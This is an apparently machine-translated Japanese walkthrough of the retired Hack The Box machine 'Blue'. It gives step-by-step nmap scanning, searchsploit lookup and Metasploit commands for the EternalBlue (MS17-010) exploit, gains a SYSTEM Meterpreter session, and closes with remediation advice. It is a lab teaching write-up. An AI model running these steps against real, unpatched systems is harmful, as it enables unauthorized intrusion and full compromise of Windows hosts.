落ち着いてボックスをハックする-ブルー

Hack The Box(HTB)は、侵入テストのスキルをテストできるオンラインプラットフォームです。

常に更新されるいくつかの課題が含まれています。それらのいくつかは現実世界のシナリオをシミュレートし、それらのいくつかはCTFスタイルの挑戦に傾倒しています。

リタイアしたHTBマシンの書き込みのみが許可されます。

Blueは、Hack TheBoxで最もシンプルなマシンの1つです。しかし、これは、大規模なランサムウェアや暗号マイニング攻撃を通じて企業を危険にさらすために使用されてきたEternalBlueエクスプロイトの影響を示しています。

次のツールを使用して、KaliLinuxボックスでボックスをポーンします。

  • nmap
  • searchsploit
  • metasploit
  • Meterpreter

始めましょう。

まず、/ etc / hostsファイルにBlueを追加します。

nano /etc/hosts

10.10.10.40 blue.htb

ステップ1-偵察

マシンを悪用する前の最初のステップは、スキャンと偵察を少し行うことです。

これは、後で何を悪用できるかを決定するため、最も重要な部分の1つです。できるだけ多くの情報を取得するために、このフェーズにより多くの時間を費やすことをお勧めします。

ポートスキャン

Nmap(ネットワークマッパー)を使用します。Nmapは、ネットワーク検出とセキュリティ監査のための無料のオープンソースユーティリティです。

生のIPパケットを使用して、ネットワーク上で使用可能なホスト、それらのホストが提供しているサービス、実行中のオペレーティングシステム、使用されているパケットフィルター/ファイアウォールのタイプ、およびその他の多数の特性を判別します。

このツールでネットワークをスキャンするために使用できるコマンドはたくさんあります。詳細については、こちらのドキュメントをご覧ください。

次のコマンドを使用して、集中スキャンを実行します。

nmap -A -v blue.htb

-A: OS検出、バージョン検出、スクリプトスキャン、およびtracerouteを有効にします

-v:詳細レベルを上げます

blue .htb:ブルーボックスのホスト名

結果が少し圧倒的すぎる場合は、次のことを試してみてください。

nmap blue.htb

以下を含むかなりの数の開いているポートがあることがわかります。

ポート445、Microsoft-DS(ディレクトリサービス)SMBファイル共有

nmapスキャンから、コンピューター名(haris-PC)とSMBバージョン(2.02)に関する情報が得られます。

サーバーメッセージブロック(SMB)は、ユーザーがリソースを使用したり、ファイルを共有、開いたり、編集したりするために、リモートコンピューターやサーバーと通信できるようにするネットワークプロトコルです。

このボックスの名前と、ポート445が開いているWindowsマシンであることから、このマシンはEternalBlueに対して脆弱であると推測できます。nmapスクリプトを使用して、次の情報でこの情報を確認します。

nmap --script vuln -p 445 blue.htb

このボックスは、Microsoft SMBv1サーバー(ms17-010)のリモートコード実行の脆弱性に対して脆弱であることがわかります。

ステップ2-ms17-010を理解する

ms17-010とは何ですか?

EternalBlueは、米国国家安全保障局(NSA)によって開発されたサイバー攻撃エクスプロイトです。マイクロソフトが脆弱性のパッチをリリースしてから1か月後の2017年4月14日に、ShadowBrokersハッカーグループによってリークされました-ウィキペディア

あなたはここでもっと読むことができます。この脆弱性にはパッチが適用されており、Microsoftのセキュリティ情報にMS17-010として記載されています。

EternalBlueを使用すると、ハッカーは任意のコードをリモートで実行してネットワークにアクセスできます。これは、Windows OSSMBプロトコルの脆弱性を悪用します。このエクスプロイトは、ネットワーク全体とそれに接続されているデバイスを危険にさらす可能性があります。

EternalBlueを利用するマルウェアは、ネットワーク全体に拡散する可能性があります。2017年、暗号ランサムウェアであるWannaCryは、接続されているすべてのデバイスに感染するネットワーク全体に広がるEternalBlueエクスプロイトを使用しました。

ステップ3-EternalBlueを悪用する

Searchsploitを使用して、既知のエクスプロイトがあるかどうかを確認します。Searchsploitは、エクスプロイトデータベースのコマンドライン検索ツールです。

次のコマンドを使用します。

searchsploit eternalblue

以下を使用して、エクスプロイトの詳細を取得できます。

searchsploit -x 41738.py

エクスプロイトデータベースをチェックして、エクスプロイトを見つけることもできます。

利用可能なMetasploitモジュールが1つあります。

ハッキングを簡単にする侵入テストフレームワークであるMetasploitを使用します。これは、多くの攻撃者や防御者にとって不可欠なツールです。

KaliでMetasploitFrameworkを起動し、エクスプロイトに使用するコマンドを探します。

次のコマンドでMetasploitを起動するときは、忘れずに更新してください。

msfupdate

補助を使用して、ターゲットがMetasploit上のEternalBlueに対して脆弱であるかどうかを確認することもできます。次のコマンドで開始します。

search eternalblue

その場合は

use 1

選ぶ

auxiliary/scanner/smb/smb_ms17_010

あなたはでオプションをチェックすることができます

show options

とRHOSTSを設定します

set RHOSTS blue.htb

次に、補助を実行します

run

ホストがMS17-010に対して脆弱である可能性が高いことがわかります。

では、エクスプロイトを確認してみましょう。

use 2

またはコマンド

exploit/windows/smb/ms17_010_eternalblue

RHOSTSのオプションを設定する必要があります

そしてLHOST–私のものは10.10.14.24でした。独自のLHOSTで設定する必要があります。こちらで確認できます。

エクスプロイトを実行する前に、マシンが脆弱かどうかをここで確認できます。これにより、コマンドで以前に使用した補助が実行されます

check

次に、エクスプロイトを実行します

run

Meterpreterセッションを取得する前に、エクスプロイトを数回実行する必要がありました。

OffensiveSecurityのMeterpreterの定義は次のとおりです。

Meterpreterは、メモリ内のDLLインジェクションステージャーを使用、実行時にネットワーク上で拡張される、高度で動的に拡張可能なペイロードです。ステージャーソケットを介して通信し、包括的なクライアント側のRubyAPIを提供します。コマンド履歴、タブ補完、チャネルなどを備えています。

Meterpreterについて詳しくは、こちらをご覧ください。

いくつかの情報を収集することから始めましょう。

getuidは、呼び出しプロセスの実際のユーザーIDを返します。

NT Authority \ SYSTEMまたはLocalSystemアカウントは、組み込みのWindowsアカウントです。これは、Windowsローカルインスタンスで最も強力なアカウントです。そのマシンの管理者アクセス権があります。

ステップ4 - user.txtフラグを探す

Documents andSettingsからharisフォルダーに移動します。

次のコマンドを使用して、すべてのファイル/フォルダーを一覧表示できます。

ls -la

私はその後に移動し、デスクトップ

cd Desktop

そして、ユーザーフラグを見つけました!ファイルの内容はで確認できます

cat user.txt

ステップ5- root.txtフラグを探す

ここでルートフラグを見つけましょう。ユーザーに移動し、管理者/デスクトップフォルダーにチェックインします。旗を見つけました!

次のコマンドを使用して、ファイルの内容を確認します。

cat root.txt

おめでとうございます!両方のフラグが見つかりました。

修復

  • Microsoft Windows SMBv1のセキュリティ更新プログラムでデバイスにパッチを適用します。Microsoft Security Bulletinをチェックして、影響を受けるOSを確認できます。
  • SMB v1を無効にし、SMBv2またはv3を使用します
  • 最小特権の原則をすべてのシステムとサービスに適用します

コメントしたり、質問したり、友達と共有したりすることを躊躇しないでください:)

シリーズKeepCalm and Hack theBoxのその他の記事はこちらでご覧いただけます。

TwitterまたはLinkedInで私をフォローできます。

そして、#を忘れないでくださいGetSecure、#BeSecure&#StaySecure